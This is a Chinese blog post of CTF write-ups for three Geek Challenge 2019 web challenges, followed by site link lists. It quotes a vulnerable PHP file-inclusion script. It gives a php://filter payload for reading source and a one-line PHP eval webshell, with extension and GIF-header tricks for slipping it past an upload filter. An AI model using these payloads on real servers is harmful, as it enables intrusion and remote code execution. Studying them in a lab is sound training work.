【极客大挑战】Day6

最新推荐文章于 2024-07-30 23:33:07 发布
最新推荐文章于 2024-07-30 23:33:07 发布
阅读量583 收藏 9
点赞数 19
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80155614/article/details/136122403
版权

[极客大挑战 2019]Secret File

考察知识点:bp抓包,文件包含,伪协议

查看页面源代码,发现

进去看看

仍然没啥用,再次查看源代码,发现action.php,进去看看直接到了end页面,猜测反应太快,试试抓包

发现secr3t.php

之后为

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

代码解析

如果$file包含"../"、"tp"、"input"或"data"(不区分大小写),则脚本会输出"Oh no!"并终止执行。

禁用了一部分伪协议的关键词,那么就用php://filter伪协议

?file=php://filter/read=convert.base64-encode/resource=xx.php

base解密

flag{3dbc981c-5d2a-4f52-895b-86ae37448724}

[极客大挑战 2019]Knife

考点:webshell工具(蚁剑)使用

flag{7d88923e-1f22-4ddb-b617-94caed8ed17c}

[极客大挑战 2019]Upload

考点:文件上传

先上传一句话木马试试

这时选择抓包,修改上传格式)(每次抓包时需修改上传格式)

结果

文件绕过的格式也有很php,php3,php4,php5,phtml.pht

在这里选择phtml,这个是可以的

结果

就是我的文件中包含了<?,需要过滤掉

使用 script标签 绕过“<?”限制

<script language="php">eval($_POST['pass']);</script>

结果

使用 GIF89a 图片头文件欺骗 php会检测其为gif图片

添加GIF89a

上传成功,用蚁剑连接

根目录下找到

flag{abc83cc3-ea98-4402-97c1-021526640621}

是小嗨嗨啊
关注
极客挑战2023 misc 部分wp
m0_72135419的博客
11-28 1072
公众号发送flag获取图片后查看lsb隐写。
极客挑战2019(复习一下漏洞)
qq_62046696的博客
07-17 1117
这种一般都是备份文件了,其实不太喜欢备份文件,扫目录太慢了,打开dirsearch进行扫目录了,其实是先尝试了一下index.php.bak发现没有,扫出来了www.zip。这道题难就难在,不按套路出牌,Flaaaag里面的f14gawsl字段,里面的值时NO,真正的flag在F1nal1y表里面的password字段。2、再尝试闭合方式,账号输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合(提示记得密码填上东西)...
[极客挑战 2019]Http1
2301_79964672的博客
07-23 1023
HTTP Referer(实际上正确的拼写应该是 "referrer",但遵循传统,通常写作 "referer")是一个HTTP请求头字段,它指示一个请求是从哪个页面发起的。HTTP数据包,通常指的是HTTP消息,它由两部分组成:请求行(对于请求消息)或状态行(对于响应消息),以及随后的一系列头部字段(headers),最后是消息体(body,可选)。是一个 HTTP 请求头字段,用于识别通过代理服务器或负载均衡器连接到 Web 服务器的客户端的原始 IP 地址。来分析流量来源,了解访问者的真实 IP。
day1-1[极客挑战 2019]EasySQL
Moyv的博客
01-22 71
[极客挑战 2019]EasySQL
极客挑战2019-upload1
2301_79964672的博客
07-13 394
GIF(Graphics Interchange Format)是一种广泛使用的图像文件格式,它支持无损压缩,并且可以包含多帧图像,从而实现动画效果。元素的一个属性,用于指定表单数据的编码类型。当表单需要上传文件时,这个属性是必需的。它允许表单数据以二进制形式发送,这样文件就可以作为请求的一部分被上传。在这个例子中,当用户填写用户名并选择一个文件后,点击提交按钮,表单数据将通过 POST 方法发送到服务器的。是稍后发布的版本,它增加了对动画的支持。将文件头对应该背景的文件头,该背景也是GIF。
[极客挑战 2019]BabySQL1
2301_79964672的博客
07-30 1002
尝试1’ order by 3# 发现order中的or被过滤,同时by也被过滤。可看出information,from,where被过滤。使用万能钥匙突破,突破失败,同时发现是字符型。它们两都一样,细心的你能找出问题吗。因此直接尝试联合注入。
第九届极客挑战 部分WP
weixin_30446613的博客
11-19 513
CODE 和0xpoker分0day 百度 取石子游戏。 https://blog.csdn.net/qq_33765907/article/details/51174524 已经说得很详细了,慢慢来就好了。 IOT 无题 流量分析题目,wireshark打开。 文件->导出对象->HTTP MISC 钢铁是怎样炼成的 https://pan.baidu.com/s/1DPuBC...
day1-5[极客挑战 2019]Secret File
Moyv的博客
01-22 149
[极客挑战 2019]Secret File
day1-2[极客挑战 2019]Havefun
Moyv的博客
01-22 65
[极客挑战 2019]Havefun
GO七天开发挑战:7天实现Web框架-Gee(day 3 前缀树路由Router)
weixin_41804479的博客
09-25 841
其中,roots 是请求的路由对应的树根节点,用于判断路由是否匹配,起始的树节点为 GET/POST等请求类型节点(key eg, roots['GET'] roots['POST']);否则查找子树中所有可以匹配的节点,遍历这些节点,递归查找下一层是否匹配,直至找到完全匹配路由的叶子节点,并将该叶子节点返回。(2) 查找子树中所有可能的匹配:遍历当前节点对象的所有子节点,将所有可匹配的节点放入 slice 中,遍历所有节点后,返回 slice。根据请求的类型以及路由找到匹配的节点后,返回对应的响应内容。
本人亲自整理的极客时间设计模式之美的硬核笔记
菼执的博客
10-20 4020
由于笔记内容过多,我把它放到语雀上了。 点击我
GO七天开发挑战:7天实现Web框架-Gee(day 4 分组控制Group)
weixin_41804479的博客
09-30 734
这里的分组是指对可以进行相似处理的路由进行分组,是否分为一个组通常是以前缀进行区分,例如 /admin 为一个分组,那么 /admin/a 和 /admin/b 就是该分组下的子分组。如果没有分组控制,那么就需要对这两个不同的路由分别进行控制,会增加不必要的工作,也会增加路由控制的难度和复杂度。此外,分组支持嵌套,父分组的功能应该可以作用到子分组上,例如 /admin分组应该包含顶层分组 / 的相关处理。分组需要通过前缀来对分组进行区分,所以包含 string 类型的 prefix;
2021-06-18 CTF Webbuuoj day14
LiNa_lInA_741的博客
06-20 521
CTF Web buu oj day14[极客挑战 2019]Upload类型解题 [极客挑战 2019]Upload 类型 文件上传 解题
BUUCTF__web题解合集(九)
风过江南乱的博客
09-23 1059
1、[GYCTF2020]FlaskApp 2、[NPUCTF2020]ReadlezPHP 3、[MRCTF2020]Ezpop 4、[极客挑战 2019]RCE ME 5、[CISCN2019 总决赛 Day2 Web1]Easyweb、
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8465
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
java基于ssm+jsp珠宝购物网站系统源码 带毕业论文
最新发布
09-20
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;JSP技术 2、项目代码都经过严格调试,代码没有任何bug!下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
基于SSM的企业工资管理系统.zip(毕设&课设&实训&大作业&竞赛&项目)
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
基于java的大学生兼职系统设计与实现.docx
09-20
基于java的大学生兼职系统设计与实现.docx
极客挑战 2019]EasySQL
09-03
EasySQL 是极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

是小嗨嗨啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值